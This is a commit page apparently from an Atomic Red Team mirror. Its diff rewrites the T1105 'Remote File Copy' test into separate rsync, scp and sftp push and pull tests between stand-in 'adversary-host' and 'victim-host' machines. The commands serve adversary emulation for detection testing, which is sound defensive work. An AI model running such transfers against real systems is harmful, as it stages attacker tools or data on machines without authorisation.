security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #390 from ForensicITGuy/t1105-fix

Browse Source 
Fixed T1105 test
This commit is contained in:
Keith McCammon
2018-11-10 15:24:25 -07:00
committed by GitHub
parent 159d503bdb c2c27aeb71
commit 50c590cb1f
1 changed files with 155 additions and 30 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1105/T1105.yaml
+155 -30
View File
@@ -3,45 +3,170 @@ attack_technique: T1105
display_name: Remote File Copy
atomic_tests:
- name: rsync - scp - sftp remote file copy
- name: rsync remote file copy (push)
description: |
Utilize rsync, scp and sftp to perform a remote file copy
Utilize rsync to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
local_path:
description: Path of folder to copy
type: Path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: String
default: victim
remote_host:
description: Remote host to copy toward
type: String
default: victim-host
remote_path:
description: Remote path to receive rsync
type: Path
default: /tmp/victim-files
executor:
name: bash
command: |
### FIX: Not sure how to handle commands that need to be run on multiple systems
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
- name: rsync remote file copy (pull)
description: |
Utilize rsync to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_path:
description: Path of folder to copy
type: Path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: String
default: adversary
remote_host:
description: Remote host to copy from
type: String
default: adversary-host
local_path:
description: Local path to receive rsync
type: Path
default: /tmp/victim-files
executor:
name: bash
command: |
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
# Victim System Configuration
# Ensure SSH access has been configured for a victim account
# Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
- name: scp remote file copy (push)
description: |
Utilize scp to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
local_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: String
default: victim
remote_host:
description: Remote host to copy toward
type: String
default: victim-host
remote_path:
description: Remote path to receive scp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
# Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
- name: scp remote file copy (pull)
description: |
Utilize scp to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: String
default: adversary
remote_host:
description: Remote host to copy from
type: String
default: adversary-host
local_path:
description: Local path to receive scp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
# Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
- name: sftp remote file copy (push)
description: |
Utilize sftp to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
local_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: String
default: victim
remote_host:
description: Remote host to copy toward
type: String
default: victim-host
remote_path:
description: Remote path to receive sftp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
# Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
# Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
# Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
- name: sftp remote file copy (pull)
description: |
Utilize sftp to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: String
default: adversary
remote_host:
description: Remote host to copy from
type: String
default: adversary-host
local_path:
description: Local path to receive sftp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}